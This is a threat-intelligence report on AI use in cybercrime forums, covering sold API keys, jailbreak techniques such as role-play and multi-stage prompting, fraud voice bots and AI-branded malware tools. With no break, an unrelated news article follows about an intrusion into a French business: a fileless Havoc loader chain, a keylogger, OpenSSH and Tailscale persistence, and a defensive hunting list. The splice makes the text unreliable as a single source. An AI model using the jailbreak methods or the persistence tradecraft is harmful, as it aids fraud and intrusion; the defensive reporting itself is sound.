Counter Threat Unit™ (CTU) researchers have observed artificial intelligence (AI) emerging into a prominent topic in underground communities, with threat actors discussing its potential, claiming its use for malware and tool development, and expressing concerns. Many claims have not been validated, but the posts reveal perceptions about generative AI and examples of how it may be used in cybercriminal activity. In some respect, threat actors are facing the same challenge as everyone else — seeking to preserve economic viability during a technological transition while trying to identify how and when to embrace AI.

Access and knowledge sharing

Defenders and threat actors test and experiment with AI-enabled capabilities, but from very different positions. Defenders typically benefit from greater access to commercial tooling, dedicated engineering support, and the financial freedom to trial emerging technologies at scale. In contrast, resource-constrained threat actors are looking for practical ways to gain access.

CTU™ researchers have observed API keys for generative AI tools being sold via shared accounts, brokered access, and alternative platforms. In one thread, the “CyberThreat” persona offered brokered API keys for tools such as ChatGPT, Claude, and Grok (see Figure 1). In another post, “VOLTIC” advertised access to multiple AI models as a cost-effective solution for buyers who need AI capabilities (see Figure 2). Although both personas were new to the underground marketplaces, the posts quickly attracted interest and other personas endorsed the services.

Figure 1: CyberThreat selling brokered API keys

Figure 2: VOLTIC advertising an unlimited AI tool

While API keys and associated generative AI chatbots are available for sale across underground forums, there appears to be a knowledge gap. Personas turn to each other for guidance ranging from basic setup and access through to practical tradecraft. New channels focused on AI and large language models (LLMs) and their use continually emerge on underground forums (see Figure 3). Threads include discussions about “jailbreaking” public AI models, including efforts to bypass censorship and other safeguards imposed by AI vendors. Personas frequently reference experimentation with prompt‑based techniques to circumvent content controls, including role‑play framing, multi‑stage prompting, contextual manipulation, and iterative refinement. CTU researchers have also observed self-described “experienced AI users” sharing examples and lessons learned, including prompt templates, workflows, examples of LLM experimentation, and purported best practices for operationalizing AI in malicious scripting and automation.

Figure 3: Sample of posts on a channel dedicated to AI and machine learning (ML) questions

Since January 1, 2026, CTU researchers have noted an increase in offers to hire, or partner with, specialists who can operationalize AI on others’ behalf. Multiple personas known for recruiting various roles (e.g., blockchain developers, coders, social engineers) advertised for AI prompt engineers (see Figure 4). The offering of specialized services is common within underground communities, enabling threat actors to monetize their skills and giving cybercriminals access to expertise and capabilities they lack.

Figure 4: Recruitment post for an OpenAI prompt engineer

Social engineering and deception

Threat actors are exploring AI to enhance social engineering and deception techniques, although only a limited number currently incorporate generative AI into their toolkits. Forum posts suggest that generative AI models can be integrated into common fraud and intrusion workflows to help threat actors overcome language barriers, maintain consistency, distribute content at scale, and rapidly iterate lures across email, SMS, messaging platforms, and voice channels. Notably, CTU researchers have observed advertisements for realistic voice bots for vishing and call-based fraud (see Figure 5). Threat actor claims and positive reviews suggest that these bots can be trained or prompted to emulate tone, cadence, and conversational patterns.

Figure 5: Advertisement for an AI Telegram voice bot

Some personas have expanded beyond voice bots to AI models. On multiple forums, the “HackingRealm” persona advertised an AI OnlyFans Models service to create credible, scalable personas for romance fraud and other social engineering campaigns. In addition to drafting and refining conversational messages, advertised services claim to generate synthetic profile imagery that mimics authentic individuals. HackingRealm’s Telegram channel also links to a website for model creation (see Figure 6) that includes a page listing positive feedback from users.

Figure 6: AI model creation website

Malware and tooling

Threat actors are advertising AI-enabled tools and malware on various underground communities. The following examples were posted on English-language cybercrime marketplaces. CTU researchers have not validated the claimed capabilities but selected these samples to demonstrate the breadth and depth of tools and malware marketed as “AI-led” or “AI-enabled.” Several of the tools are open source, and the threat actors encourage forum members to explore how legitimate AI tools can be used for malicious purposes.

Leak Bazaar

On March 25, 2026, the “Snow” persona announced SnowTeam’s launch of Leak Bazaar, a platform dedicated to the exchange of stolen corporate data (see Figure 7). Over more than four years, Snow has contributed over 400 posts and garnered more than 600 positive reactions, demonstrating consistent engagement and earning the trust of the community. The announcement mentions the platform’s machine learning-enabled analysis and reverse engineering capabilities, emphasizing its aim to help threat actors efficiently monetize large datasets while enabling buyers to purchase targeted segments rather than entire collections. Leak Bazaar purportedly leverages automation and machine learning (ML) to triage massive volumes of data, filter out “system junk,” and apply natural language processing (NLP) to extract and organize relevant content, further supporting the platform’s value proposition.

Figure 7: Announcement of Leak Bazaar launch

ApexAI

On April 12, “ApexDev” introduced the Apex AI tool intended for “carding, hacking, and malware creation” (see Figure 8). This malicious tool is unrelated to the legitimate ApexAI tool. ApexDev claimed that Apex AI utilizes advanced techniques, including log analysis for pattern recognition and adaptive network configuration to support the operation of malicious processes. Furthermore, the tool can purportedly generate a range of malware types, such as stealers and trojans, and it also includes code optimization, analysis, and debugging features.

Figure 8: Apex AI announcement by ApexDev

ApexDev is primarily associated with website and panel creation, as well as sniffers, and has received positive feedback. The persona has encouraged other forum users to engage with AI, running competitions and offering $50 for utilities that are created and shared. CTU researchers have identified ApexDev’s name in arbitration sections of forums following complaints about behavior. However, all complaints seem to have been resolved, and the persona continues operations.

Metatron

On April 5, the “Wikileaks” persona described an AI-powered penetration testing assistant known as Metatron that operates locally on a user’s system without reliance on cloud services, API keys, or subscriptions (see Figure 9). The tool can leverage a locally hosted AI model to analyze reconnaissance results, identify vulnerabilities, suggest potential exploits, and recommend fixes. Metatron is freely available via GitHub, and third-party reporting has highlighted its use of an agentic loop to support autonomous, iterative analysis. WikiLeaks posted the information to encourage forum members to explore how legitimate tools that leverage AI can be used for malicious activity.

Figure 9: Metatron description posted by WikiLeaks

PolyEngine

In an April 10 post on the ReadTheManual (RTM) forum, the “ADMIN” persona described a polymorphic PE packer named PolyEngine. This post used almost identical wording as an April 9 X (formerly Twitter) post by “Panos Gkatziroulis” that also included a link to a GitHub repository (see Figure 10). PolyEngine was allegedly designed to evade endpoint detection and response (EDR) heuristics and antivirus detection through layered execution methods and obfuscation techniques. ADMIN also claimed to have used AI (“Claude Code”) to refine and implement specific functionality, to improve code quality, and to optimize evasion techniques.

Figure 10: Nearly identical wording in posts about PolyEngine on the RTM forum (top) and X (bottom)

As administrator, ADMIN is responsible for maintaining order and trust within the RTM community by enforcing rules, resolving disputes, and overseeing moderation, as well as managing the forum’s technical and structural aspects. This position of authority adds credibility to the persona’s posts.

Cobalt Strike

On April 9, the “NightRaider” persona advertised an updated version of Cobalt Strike, highlighting user‑interface improvements and the beta introduction of a REST API (see Figure 11). The API’s features include scripting and task‑tracking capabilities, as well as an MCP server integration with the Claude LLM. NightRaider has predominantly advertised alleged EDR killers but also offers malware such as CobaltStrike and BruteRatel. The persona is active in the advice sections of multiple forums and describes themselves as “a man for everything” who focuses on virology and malware.

Figure 11: NightRaider advertising a Cobalt Strike update

This post illustrates how threat actors are reframing established offensive tooling as “AI‑enabled” by adding mainstream LLM integrations and automation interfaces to existing workflows. The advertised REST API and MCP support may appeal to buyers looking to script tasking and add lightweight task tracking around post‑exploitation. The post also reflects a broader trend of using “agentic” and LLM‑integrated branding as a differentiator, even when it primarily enables convenience and automation rather than new tradecraft.

AI-assisted cyberattacks

Personas have discussed the use of public AI assistants for intrusion activity. Figure 12 shows a post by the Rehub forum administrator about a threat actor’s use of Claude to support a cyberattack against Mexican government networks and steal data, and the attacker’s attempted use of ChatGPT to gather additional information. The poster’s position as forum administrator lent credibility and visibility to the story and prompted other members to discuss and exchange instances of stolen Claude code, further fueling dialogue around the use of AI in cyberattacks.

Figure 12: Post describing the use of AI in an attack on Mexican government networks

In another example, the “GhostVibe” persona claimed to be seeing an increase in AI-assisted malware within their own sample analysis, citing “better phishing generation,” improved coding, and “faster adaptation” against defensive controls (see Figure 13). The threat actor also framed AI as a way to improve payload and scripting quality and invited others to share similar observations. The post gained interest from fellow forum members.

Figure 13: GhostVibe discussing AI-assisted malware

Additionally, CTU researchers have observed claims that AI prompts and generated data may be captured as collateral in cyberattacks. As more organizations deploy AI across their environments, the potential exposure of this type of data is likely to increase, reinforcing the importance of secure implementation and continuous monitoring.

Skepticism and speculation

CTU researchers have observed uncertainty across underground forums and Telegram channels about how AI may reshape roles, pricing, and competitive advantage within the cybercrime economy. Personas express concern that AI will reduce work opportunities, particularly for manual services such as malware development and scripting (see Figure 14). Some also discredit the use of AI, encouraging others to rely on their own capabilities and human skillsets.

Figure 14: Sample posts discussing concerns around AI’s impact on jobs

On April 7, 2026, Anthropic announced a cybersecurity initiative named Project Glasswing that was prompted by capabilities observed in its unreleased frontier AI model, Claude Mythos Preview. Anthropic assessed that the model could autonomously identify and chain software vulnerabilities at a level comparable to highly skilled human researchers and therefore chose not to release it publicly. This claim sparked discussions involving established members of underground forums. Some threat actors remained skeptical (see Figure 15); however, many personas speculated on the use and potential of generative AI (see Figure 16). The posts align with the diverse attitudes toward AI that CTU researchers have observed across forums.

Figure 15: Skepticism about Mythos

Figure 16: Reactions to AI in a thread discussing Mythos

Conclusion

AI is an ongoing and evolving topic of discussion across underground forums. Threat actors have expressed uncertainty and curiosity about its potential impact, and posts reflect skepticism and doubt as well as active experimentation.

The sample posts in this analysis not only demonstrate how threat actors imply AI-driven capabilities but also highlight a broader trend of leveraging these narratives for marketing. Personas often seek to legitimize their technical prowess and attract attention, which may inspire others to emulate or innovate upon their approaches. Many posts reference manipulation of legitimate AI tools and services for malicious purposes. Some threat actors may not participate in forum discussions, opting instead to quietly explore the technology’s practical limits and tradecraft implications.

As AI tooling and capabilities evolve, organizations should continue to prioritize strong cyber hygiene such as timely patching, multi-factor authentication (MFA), and passkey use to reduce exposure to established tradecraft and future AI-assisted acceleration. Defenders should also maintain visibility across their environment to identify and mitigate anomalous activity before attacks escalate.

A French-speaking attacker broke into a small French automotive business, planted a keylogger, and stole banking and email credentials.

Ordinary stuff, until one move near the end.

Before his command-and-control server went dark, he installed OpenSSH and Tailscale on a victim’s machine, building a way back in that did not run through the C2 at all. When the Havoc server went offline the next day, his access did not. Eighteen days later, the C2 came back, his agents reconnected on their own, and he carried on.

Cato Networks captured the whole operation command by command, 339 of them over 33 days, after the operator left his SSH keys and a step-by-step playbook in an open storage bucket. The write-up, published Tuesday by Cato CTRL researcher Vitaly Simonovich, is a rare view of an intrusion from the operator’s keyboard rather than the forensic leftovers.

Researchers’ lesson is blunt: pulling a C2 server offline is not remediation if the attacker has already built a separate door.

The actor, handle “Poisson,” is not an APT. Researchers describe a junior operator on what looks like a school schedule, active after 3 p.m. CET with a long midday gap, all of it running on free-tier kit: DuckDNS, Backblaze B2, and a cheap IONOS VPS in Berlin. His tradecraft was thin.

He leaked his home directory five times, named his storage buckets after his own handle, and left a test file of his own keystrokes typed over and over inside the keylogger package. He failed at roughly half of what he tried. He compromised four machines anyway.

The chain

The malware ran almost entirely in memory. A VBScript stager with a sandbox-evasion delay decrypted a PowerShell loader, which pulled down a .NET loader that ran Havoc’s Demon agent without dropping the implant to disk. For elevation, he used Start-Process -Verb RunAs, which is not a silent UAC bypass. It pops the Windows consent prompt and waits for someone to click Yes. On one victim, it took a dozen tries across two days.

After that came the nailing-down: a scheduled task running at every logon with highest privileges, shellcode injected into Explorer.exe, and a custom-built RustDesk as a backup channel. The credential grabber was a 70-line Python keylogger that wrote keystrokes to a local file, with no beacon and no exfil server. Poisson just logged in, grabbed the file by hand, and ran powercfg to keep the machines from sleeping, so harvesting never paused.

The move that matters

On April 7, in a five-hour overnight session, he installed OpenSSH Server and Tailscale, joined the victim’s machine to his private Tailscale network, and set up key-based SSH and a reverse tunnel. Now he could reach the machine over Tailscale’s encrypted mesh with no C2 and no exposed ports.

The next day, the Havoc infrastructure went offline. Cato does not say why, and it barely matters: the Tailscale path sat on a separate network, so the access lived.

When the C2 returned on April 26, the agents reconnected automatically, no re-compromise required. Over the final five days, he ran 145 more commands, probed smart-card and certificate stores (a sign he was eyeing certificate-based logins), ran two unexplained executables from a file named Thales.zip for about 32 minutes total, then deleted 17 files and went quiet on May 1.

What he wanted was narrow. No Mimikatz, no lateral movement, no ransomware, and no sign he took the documents he browsed, from tax records to insurance. Just what people type: banking logins, email passwords, government portals. For a small business owner, that is direct financial exposure.

None of the tools is new, which is the point. China’s APT31 used Tailscale through 2024 and 2025 to tunnel quietly out of Russian IT firms, Scattered Spider has leaned on legitimate remote-access tools like Ngrok and Fleetdeck, and RustDesk, Poisson’s backup channel, turns up in recent Akira ransomware intrusions.

The binaries are signed and legitimate, so detection that stops at bad files, not bad behavior, misses them. What Poisson adds is command-level proof that the trick outlives a takedown, run by someone clearly still learning.

What to watch

Cato’s hunting list is concrete:

• Alert when OpenSSH Server installs on a Windows workstation, which is rarely legitimate.
• Watch for tailscale.exe on machines that have no reason to run a VPN.
• Look for ssh -R reverse tunnels heading to outside hosts.
• Check for wscript.exe running .vbs files out of user staging folders.
• Flag scheduled tasks set to the highest privileges that launch script interpreters.
• Watch for powercfg standby-timeout changes that keep machines awake.
• Block DuckDNS.

The bigger one: when you find a C2, assume it is not the only way in, and go hunting for the quiet persistence layer behind it.

What was in Thales.zip, and what those two programs did in their 32 minutes on the machine, is the question Cato leaves open. The answer that matters more: the C2 was never the intrusion, just one way into it. Kill it and leave OpenSSH, Tailscale, the scheduled task, and the keylogger running, and the attacker still has a way back in.

That is the part remediation keeps missing.